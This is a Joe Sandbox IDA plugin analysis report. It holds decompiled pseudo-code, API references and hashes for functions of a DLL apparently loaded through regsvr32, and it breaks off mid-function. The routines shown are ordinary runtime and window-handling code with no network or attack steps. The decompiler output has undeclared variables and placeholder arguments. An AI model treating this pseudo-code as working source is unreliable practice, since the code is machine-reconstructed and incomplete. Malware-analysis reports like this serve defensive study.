Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prologTextWindowlstrcpynlstrlen
String ID:
API String ID: 3022380644-0
Opcode ID: 7131124630a9dfe8a6b2c307b208c6c12adeaedec208938fd2302da43044b269
Instruction ID: 59e866b8c914197c7af95b43c0e78dc9f411df53cb9001daccb1174aff142d08
Opcode Fuzzy Hash: 7131124630a9dfe8a6b2c307b208c6c12adeaedec208938fd2302da43044b269
Instruction Fuzzy Hash: DC015A36910624EFDB15DFA8C848BAEBBB1FF08310F44C659F5229B261CB71A954DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001BA03 Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001BA03(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _t12;
				void* _t18;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t19 = _a8;
				_t12 = E1001B9E2( *_t20,  *_a8, _t20);
				_t22 = _t21 + 0xc;
				if(_t12 != 0) {
					_t3 = _t20 + 4; // 0x4
					_t18 = E1001B9E2( *_t3, 1, _t3);
					_t22 = _t22 + 0xc;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
					}
				}
				_t6 = _t20 + 4; // 0x4
				if(E1001B9E2( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
				}
				_t10 = _t20 + 8; // 0x8
				return E1001B9E2( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
			}

0x1001ba04
0x1001ba09
0x1001ba12
0x1001ba17
0x1001ba1c
0x1001ba1e
0x1001ba26
0x1001ba2b
0x1001ba30
0x1001ba32
0x1001ba32
0x1001ba30
0x1001ba35
0x1001ba48
0x1001ba4a
0x1001ba4a
0x1001ba4d
0x1001ba60

APIs

___addl.LIBCMT ref: 1001BA12
___addl.LIBCMT ref: 1001BA26
___addl.LIBCMT ref: 1001BA3E
___addl.LIBCMT ref: 1001BA56

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ___addl
String ID:
API String ID: 2260456530-0
Opcode ID: c078f337c12ced7b52d7d91989df3d54b5648189412cefbb7d1529b08b21fb15
Instruction ID: 96e5a750fa877066d70bb02f8032130ad55ec3bb9e9b289922908bb5b81f5c31
Opcode Fuzzy Hash: c078f337c12ced7b52d7d91989df3d54b5648189412cefbb7d1529b08b21fb15
Instruction Fuzzy Hash: 8BF06276400902AFDA10CE41DC02E56B7E9FF54240B144465FE5886032EB32E9A9CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10025266 Relevance: 6.0, APIs: 4, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10025266(void* __esi, struct HWND__* _a4, CHAR* _a8) {
				intOrPtr _v8;
				char _v264;
				intOrPtr _t10;
				int _t20;

				_t10 =  *0x100371f4; // 0x39cf7dc9
				_v8 = _t10;
				_t20 = lstrlenA(_a8);
				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
					_t13 = SetWindowTextA(_a4, _a8);
				}
				return E10011A49(_t13, _v8);
			}

0x1002526f
0x10025278
0x10025281
0x1002528a
0x100252bb
0x100252bb
0x100252cb

APIs

lstrlenA.KERNEL32(?), ref: 1002527B
GetWindowTextA.USER32 ref: 10025297
lstrcmpA.KERNEL32(?,?), ref: 100252AB
SetWindowTextA.USER32(?,?), ref: 100252BB

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: bcb51eb4c827628d45581d86a1f59c2a831258b7d0252f24e85ddb6bb5900f65
Instruction ID: 53953f2b7f923e2f6065e864dc59350dabd8a53405bc7f9d7020dd2e02fa78f9
Opcode Fuzzy Hash: bcb51eb4c827628d45581d86a1f59c2a831258b7d0252f24e85ddb6bb5900f65
Instruction Fuzzy Hash: CDF04975900228EBDF11EF64CD88ACD7BADFB05395F008061F945D6260E7718E99DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001F3D8 Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001F3D8() {
				intOrPtr _t17;
				struct HWND__* _t19;
				intOrPtr* _t28;
				void* _t30;

				_t28 =  *((intOrPtr*)(_t30 - 0x1c));
				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t30 - 0x20)) != 0) {
					EnableWindow( *(_t30 - 0x14), 1);
				}
				if( *(_t30 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t36 = _t19 -  *((intOrPtr*)(_t28 + 0x1c));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x1c))) {
						SetActiveWindow( *(_t30 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E1001EE35(_t28, _t36);
				if( *((intOrPtr*)(_t28 + 0x54)) != 0) {
					FreeResource( *(_t30 - 0x18));
				}
				_t17 =  *((intOrPtr*)(_t28 + 0x40));
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t17;
			}

0x1001f3d8
0x1001f3dd
0x1001f3e4
0x1001f3eb
0x1001f3eb
0x1001f3f4
0x1001f3f6
0x1001f3fc
0x1001f3ff
0x1001f404
0x1001f404
0x1001f3ff
0x1001f40e
0x1001f413
0x1001f41b
0x1001f420
0x1001f420
0x1001f426
0x1001f42e
0x1001f437

APIs

EnableWindow.USER32(00000000,00000001), ref: 1001F3EB
GetActiveWindow.USER32 ref: 1001F3F6
SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1001F404
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1001F420

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Active$EnableFreeResource
String ID:
API String ID: 3751187028-0
Opcode ID: 020197bcd5d6460521301feed9d81b622fa1f6ed979486cfcfeeb4a14319daad
Instruction ID: 95538fb97461d96b47ade885aede959c10695171be7e2c0cf9a2fc55756b8812
Opcode Fuzzy Hash: 020197bcd5d6460521301feed9d81b622fa1f6ed979486cfcfeeb4a14319daad
Instruction Fuzzy Hash: 95F04F35900A55CFCF21EF94C9C55AEB7F1FF18311B20456DE112B62A0CB359D46CB11

Uniqueness

Uniqueness Score: -1.00%

Function 100289F2 Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E100289F2(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;

				_t10 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x1003a108;
					if( *0x1003a108 == 0) {
						_t5 = GetTickCount();
						 *0x1003a108 =  *0x1003a108 + 1;
						__eflags =  *0x1003a108;
						 *0x100370ac = _t5;
					}
					_t4 = GetTickCount() -  *0x100370ac;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x100370ac = _t4;
					}
					return _t4;
				}
				return E1002899B(_t10, _a8);
			}

0x100289f2
0x100289f7
0x10028a04
0x10028a12
0x10028a14
0x10028a16
0x10028a16
0x10028a1c
0x10028a1c
0x10028a23
0x10028a29
0x10028a2e
0x10028a30
0x10028a36
0x10028a38
0x10028a38
0x00000000
0x10028a3d
0x00000000

APIs

GetTickCount.KERNEL32 ref: 10028A14
GetTickCount.KERNEL32 ref: 10028A21
CoFreeUnusedLibraries.OLE32 ref: 10028A30
GetTickCount.KERNEL32 ref: 10028A36

Part of subcall function 1002899B: CoFreeUnusedLibraries.OLE32(00000000,10028A7B,00000000,?,?,1000CDA9), ref: 100289DF
Part of subcall function 1002899B: OleUninitialize.OLE32(?,?,1000CDA9), ref: 100289E5

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: 9f075085ac1902155813612b68f1517be82116e0a00c831b35725488cafaff21
Instruction ID: cbbec42d6035b90aecf89428aa475ad3b10146c3bd0bbde74679eacd634a22b6
Opcode Fuzzy Hash: 9f075085ac1902155813612b68f1517be82116e0a00c831b35725488cafaff21
Instruction Fuzzy Hash: CCE0E53480A234DEF366EB64DC8421A3AE0FB05350F518427F4849A062CB7469D1CF62

Uniqueness

Uniqueness Score: -1.00%

Function 10012649 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E10012649(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v21;
				signed char _v22;
				struct _cpinfo _v28;
				char _v284;
				char _v540;
				char _v796;
				char _v1308;
				void* __ebp;
				intOrPtr _t42;
				signed int _t45;
				char _t47;
				signed char _t48;
				signed int _t58;
				signed int _t59;
				signed int _t65;
				signed int _t68;
				signed char _t70;
				char _t71;
				signed int _t73;
				signed int _t74;
				signed char* _t78;
				signed char* _t79;
				void* _t81;
				void* _t86;
				void* _t87;

				_t80 = __edi;
				_t63 = __ebx;
				_t42 =  *0x100371f4; // 0x39cf7dc9
				_v8 = _t42;
				if(GetCPInfo( *0x1003b924,  &_v28) != 1) {
					_t45 = 0;
					__eflags = 0;
					do {
						__eflags = _t45 - 0x41;
						if(_t45 < 0x41) {
							L23:
							__eflags = _t45 - 0x61;
							if(_t45 < 0x61) {
								L26:
								 *(_t45 + 0x1003b940) = 0;
							} else {
								__eflags = _t45 - 0x7a;
								if(_t45 > 0x7a) {
									goto L26;
								} else {
									 *(_t45 + 0x1003b821) =  *(_t45 + 0x1003b821) | 0x00000020;
									_t68 = _t45 - 0x20;
									goto L22;
								}
							}
						} else {
							__eflags = _t45 - 0x5a;
							if(_t45 > 0x5a) {
								goto L23;
							} else {
								 *(_t45 + 0x1003b821) =  *(_t45 + 0x1003b821) | 0x00000010;
								_t68 = _t45 + 0x20;
								__eflags = _t68;
								L22:
								 *(_t45 + 0x1003b940) = _t68;
							}
						}
						_t45 = _t45 + 1;
						__eflags = _t45 - 0x100;
					} while (_t45 < 0x100);
				} else {
					_t47 = 0;
					do {
						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
						_t47 = _t47 + 1;
					} while (_t47 < 0x100);
					_t48 = _v22;
					_v284 = 0x20;
					if(_t48 != 0) {
						_push(__ebx);
						_t78 =  &_v21;
						_push(__edi);
						do {
							_t65 =  *_t78 & 0x000000ff;
							_t59 = _t48 & 0x000000ff;
							if(_t59 <= _t65) {
								_t73 = _t65 - _t59 + 1;
								_t74 = _t73 >> 2;
								_t81 = _t86 + _t59 - 0x118;
								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
								_t87 = _t87 + 0x18;
								_t65 = 0;
							}
							_t79 =  &(_t78[1]);
							_t48 =  *_t79;
							_t78 =  &(_t79[1]);
							_t96 = _t48;
						} while (_t48 != 0);
						_pop(_t80);
						_pop(_t63);
					}
					_push(0);
					_push( *0x1003b808);
					_push( *0x1003b924);
					_push( &_v1308);
					_push(0x100);
					_push( &_v284);
					_push(1);
					E10018622(_t63, _t65, _t80, 0x100, _t96);
					_push(0);
					_push( *0x1003b924);
					_push(0x100);
					_push( &_v540);
					_push(0x100);
					_push( &_v284);
					_push(0x100);
					_push( *0x1003b808);
					E10018266(_t63, _t80, 0x100, _t96);
					_push(0);
					_push( *0x1003b924);
					_push(0x100);
					_push( &_v796);
					_push(0x100);
					_push( &_v284);
					_push(0x200);
					_push( *0x1003b808);
					E10018266(_t63, _t80, 0x100, _t96);
					_t58 = 0;
					do {
						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
						if((_t70 & 0x00000001) == 0) {
							__eflags = _t70 & 0x00000002;
							if((_t70 & 0x00000002) == 0) {
								 *((char*)(_t58 + 0x1003b940)) = 0;
							} else {
								 *(_t58 + 0x1003b821) =  *(_t58 + 0x1003b821) | 0x00000020;
								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
								goto L12;
							}
						} else {
							 *(_t58 + 0x1003b821) =  *(_t58 + 0x1003b821) | 0x00000010;
							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
							L12:
							 *((char*)(_t58 + 0x1003b940)) = _t71;
						}
						_t58 = _t58 + 1;
					} while (_t58 < 0x100);
				}
				return E10011A49(_t45, _v8);
			}

0x10012649
0x10012649
0x10012652
0x10012657
0x10012673
0x10012786
0x10012786
0x10012788
0x10012788
0x1001278b
0x100127a6
0x100127a6
0x100127a9
0x100127be
0x100127be
0x100127ab
0x100127ab
0x100127ae
0x00000000
0x100127b0
0x100127b0
0x100127b9
0x00000000
0x100127b9
0x100127ae
0x1001278d
0x1001278d
0x10012790
0x00000000
0x10012792
0x10012792
0x1001279b
0x1001279b
0x1001279e
0x1001279e
0x1001279e
0x10012790
0x100127c5
0x100127c6
0x100127c6
0x10012679
0x10012679
0x1001267b
0x1001267b
0x10012682
0x10012683
0x10012687
0x1001268c
0x10012693
0x10012695
0x10012696
0x10012699
0x1001269a
0x1001269a
0x1001269d
0x100126a2
0x100126a6
0x100126a9
0x100126ac
0x100126bf
0x100126bf
0x100126bf
0x100126bf
0x100126c1
0x100126c2
0x100126c4
0x100126c5
0x100126c5
0x100126c9
0x100126ca
0x100126ca
0x100126cb
0x100126cd
0x100126d9
0x100126df
0x100126e0
0x100126e7
0x100126e8
0x100126ea
0x100126ef
0x100126f1
0x100126fd
0x100126fe
0x100126ff
0x10012706
0x10012707
0x10012708
0x1001270e
0x10012713
0x10012715
0x10012721
0x10012722
0x10012723
0x1001272a
0x1001272b
0x10012730
0x10012736
0x1001273e
0x10012740
0x10012740
0x1001274b
0x10012763
0x10012766
0x10012778
0x10012768
0x10012768
0x1001276f
0x00000000
0x1001276f
0x1001274d
0x1001274d
0x10012754
0x1001275b
0x1001275b
0x1001275b
0x1001277f
0x10012780
0x10012784
0x100127d4

APIs

GetCPInfo.KERNEL32(?,?), ref: 10012665

Strings

, xrefs: 100126B3
, xrefs: 1001268C

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 69a1ab0e8103bec87c632ec3901824e441be69d583726b0f82bf557f3663394d
Instruction ID: fd47742e49a48244401dd7bd98f1011f3380fbaaa6d00055f8455ce6d3a54bb6
Opcode Fuzzy Hash: 69a1ab0e8103bec87c632ec3901824e441be69d583726b0f82bf557f3663394d
Instruction Fuzzy Hash: E8411671508798AFEB16DB64CC95BFA7BE8EB05308F2008E1D741DF1A2D6308AD5D790

Uniqueness

Uniqueness Score: -1.00%

Function 10018BC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E10018BC1(intOrPtr* __eax, char* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _t33;
				char* _t40;
				char* _t47;
				char* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				char* _t51;
				char _t52;
				intOrPtr* _t62;
				signed int _t63;
				signed int _t64;

				_t40 = __ebx;
				_t62 = __eax;
				if(_a12 != 0) {
					E10018BA4((0 |  *__eax == 0x0000002d) + __ebx, 0 | _a4 > 0x00000000);
				}
				_t28 = _t40;
				if( *_t62 == 0x2d) {
					 *_t40 = 0x2d;
					_t28 = _t40 + 1;
				}
				if(_a4 > 0) {
					_t51 = _t28 + 1;
					 *_t28 =  *_t51;
					_t28 = _t51;
					_t52 =  *0x10037d7c; // 0x2e
					 *_t51 = _t52;
				}
				_t47 = E10018100((0 | _a12 == 0x00000000) + _t28 + _a4, "e+000");
				if(_a8 != 0) {
					 *_t47 = 0x45;
				}
				_t48 = _t47 + 1;
				if( *((char*)( *((intOrPtr*)(_t62 + 0xc)))) != 0x30) {
					_t33 =  *((intOrPtr*)(_t62 + 4)) - 1;
					if(_t33 < 0) {
						_t33 =  ~_t33;
						 *_t48 = 0x2d;
					}
					_t49 = _t48 + 1;
					if(_t33 >= 0x64) {
						asm("cdq");
						_t64 = 0x64;
						 *_t49 =  *_t49 + _t33 / _t64;
						_t33 = _t33 % _t64;
					}
					_t50 = _t49 + 1;
					if(_t33 >= 0xa) {
						asm("cdq");
						_t63 = 0xa;
						 *_t50 =  *_t50 + _t33 / _t63;
						_t33 = _t33 % _t63;
					}
					 *((intOrPtr*)(_t50 + 1)) =  *((intOrPtr*)(_t50 + 1)) + _t33;
				}
				return _t40;
			}

0x10018bc1
0x10018bc9
0x10018bcb
0x10018be4
0x10018be9
0x10018bed
0x10018bef
0x10018bf1
0x10018bf4
0x10018bf4
0x10018bfb
0x10018bfd
0x10018c02
0x10018c04
0x10018c06
0x10018c0c
0x10018c0c
0x10018c2c
0x10018c2e
0x10018c30
0x10018c30
0x10018c36
0x10018c3a
0x10018c3f
0x10018c40
0x10018c42
0x10018c44
0x10018c44
0x10018c47
0x10018c4b
0x10018c4d
0x10018c50
0x10018c53
0x10018c55
0x10018c55
0x10018c57
0x10018c5b
0x10018c5d
0x10018c60
0x10018c63
0x10018c65
0x10018c65
0x10018c67
0x10018c67
0x10018c6e

APIs

__shift.LIBCMT ref: 10018BE4

Part of subcall function 10018BA4: _strlen.LIBCMT ref: 10018BAC

_strcat.LIBCMT ref: 10018C21

Strings

e+000, xrefs: 10018C13

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __shift_strcat_strlen
String ID: e+000
API String ID: 208078240-1027065040
Opcode ID: 8b664c46d41d344fd38c57cadff2da02c67d8a6601e3c34f11c9681a588d6ac6
Instruction ID: e36b8a4ce4067b9ec2edcc6e788ad3d32d0794eddce4aeacccbb3fc6da22eac8
Opcode Fuzzy Hash: 8b664c46d41d344fd38c57cadff2da02c67d8a6601e3c34f11c9681a588d6ac6
Instruction Fuzzy Hash: 5921C3722093D49FD71A8E389C907953BD49B12294F1884BEE085CE292D679DBC5C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 10016BB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10016BB1() {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				signed int _t16;
				signed int _t22;
				CHAR* _t25;
				signed int _t34;
				intOrPtr _t45;

				_push(_t27);
				_t45 =  *0x1003ba4c; // 0x1
				if(_t45 == 0) {
					E10012B24();
				}
				 *0x1003a4a4 = 0;
				GetModuleFileNameA(0, 0x1003a3a0, 0x104);
				_t10 =  *0x1003ba50; // 0x33b33d8
				 *0x1003a1a4 = 0x1003a3a0;
				if(_t10 == 0) {
					L4:
					_t25 = 0x1003a3a0;
				} else {
					_t25 = _t10;
					if( *_t10 == 0) {
						goto L4;
					}
				}
				E10016A45(_t25, 0,  &_v12, 0,  &_v8);
				_t40 = _v8 << 2;
				_t16 = E10011233(_v12 + (_v8 << 2));
				_t34 = _t16;
				if(_t34 != 0) {
					E10016A45(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
					 *0x1003a188 = _v8 - 1;
					 *0x1003a18c = _t34;
					_t22 = 0;
				} else {
					_t22 = _t16 | 0xffffffff;
				}
				return _t22;
			}

0x10016bb5
0x10016bbb
0x10016bc1
0x10016bc3
0x10016bc3
0x10016bd4
0x10016bdb
0x10016be1
0x10016be8
0x10016bee
0x10016bf7
0x10016bf7
0x10016bf0
0x10016bf3
0x10016bf5
0x00000000
0x00000000
0x10016bf5
0x10016c05
0x10016c10
0x10016c16
0x10016c1b
0x10016c22
0x10016c36
0x10016c40
0x10016c46
0x10016c4c
0x10016c24
0x10016c24
0x10016c24
0x10016c52

APIs

___initmbctable.LIBCMT ref: 10016BC3
GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104,00000000,?,?,?,?,?,100117E9,?,?,?,10011907,?,?), ref: 10016BDB

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 10016BCD, 10016BD2

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FileModuleName___initmbctable
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 767393020-3922119987
Opcode ID: 44206a3e75613076b657621f3ddc6271f8e2037c73cd1e956b59ae5e27adaf61
Instruction ID: b88b0de1ae046791a26c58ea28f1b200f4da1d1c9c3bc7000e1e87d1acf64dc8
Opcode Fuzzy Hash: 44206a3e75613076b657621f3ddc6271f8e2037c73cd1e956b59ae5e27adaf61
Instruction Fuzzy Hash: EC110A72E04214AFE711CB99DCC099F7BF8EB4A360F11006AF941DB242DA74EEC08B50

Uniqueness

Uniqueness Score: -1.00%

Function 1001842E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1001842E(void* __ecx, void* __eflags) {
				int _t27;
				short* _t33;
				int _t39;
				int _t40;
				void* _t41;

				E100114D8(__ecx, __eflags);
				 *(_t41 - 0x20) = 0;
				 *(_t41 - 4) =  *(_t41 - 4) | 0xffffffff;
				_t39 =  *(_t41 - 0x2c);
				_t40 =  *(_t41 - 0x30);
				if( *(_t41 - 0x20) != 0) {
					L4:
					if(LCMapStringW( *(_t41 + 8),  *(_t41 + 0xc),  *(_t41 - 0x1c), _t40,  *(_t41 - 0x20), _t39) != 0) {
						_push(0);
						_push(0);
						if( *((intOrPtr*)(_t41 + 0x1c)) != 0) {
							_push( *((intOrPtr*)(_t41 + 0x1c)));
							_push( *((intOrPtr*)(_t41 + 0x18)));
						} else {
							_push(0);
							_push(0);
						}
						_t39 = WideCharToMultiByte( *(_t41 + 0x20), 0,  *(_t41 - 0x20), _t39, ??, ??, ??, ??);
					}
				} else {
					_t33 = E10011233(_t39 + _t39);
					 *(_t41 - 0x20) = _t33;
					if(_t33 != 0) {
						 *((intOrPtr*)(_t41 - 0x34)) = 1;
						goto L4;
					}
				}
				if( *((intOrPtr*)(_t41 - 0x34)) != 0) {
					_push( *(_t41 - 0x20));
					E1001111B();
				}
				if( *((intOrPtr*)(_t41 - 0x38)) != 0) {
					_push( *(_t41 - 0x1c));
					E1001111B();
				}
				_t27 = _t39;
				return E10012D1B(_t27);
			}

0x10018431
0x10018438
0x1001843b
0x1001843f
0x10018442
0x10018448
0x10018462
0x10018478
0x1001847a
0x1001847b
0x1001847f
0x10018485
0x10018488
0x10018481
0x10018481
0x10018482
0x10018482
0x10018499
0x10018499
0x1001844a
0x1001844e
0x10018454
0x10018459
0x1001845b
0x00000000
0x1001845b
0x10018459
0x1001849e
0x100184a0
0x100184a3
0x100184a8
0x100184ac
0x100184ae
0x100184b1
0x100184b6
0x100184b7
0x10018621

APIs

Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 100114F2
Part of subcall function 100114D8: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10011503
Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 10011549

LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 10018470
WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000), ref: 10018493

Strings

@hvpYv, xrefs: 10018493

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: QueryVirtual$ByteCharInfoMultiStringSystemWide
String ID: @hvpYv
API String ID: 1975863849-2766943729
Opcode ID: fb794a0aa2ee34228c8d1ff9b5a2823f554c989d2e60a171a3a29e6b43401857
Instruction ID: 9d08767233352586662f5a009d1dc953ff58a57d780ff25f8ad433979c5e419a
Opcode Fuzzy Hash: fb794a0aa2ee34228c8d1ff9b5a2823f554c989d2e60a171a3a29e6b43401857
Instruction Fuzzy Hash: FB11F275C0016AEFCF10DFA0DC858DEBBB9FF08354B654129FA117A060DB389AA1DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001509A Relevance: 5.1, APIs: 4, Instructions: 57
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001509A() {
				signed int _t15;
				void* _t17;
				void* _t18;
				intOrPtr* _t20;
				void* _t24;
				signed int _t26;
				void* _t27;
				intOrPtr* _t30;

				_t15 =  *0x1003b7e8; // 0x0
				_t26 =  *0x1003b7f8; // 0x0
				if(_t15 != _t26) {
					L4:
					_t27 =  *0x1003b7ec; // 0x0
					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x1003b800, 8, 0x41c4);
					 *(_t30 + 0x10) = _t17;
					if(_t17 != 0) {
						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
						 *(_t30 + 0xc) = _t18;
						if(_t18 != 0) {
							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
							 *_t30 = 0;
							 *((intOrPtr*)(_t30 + 4)) = 0;
							 *0x1003b7e8 =  *0x1003b7e8 + 1;
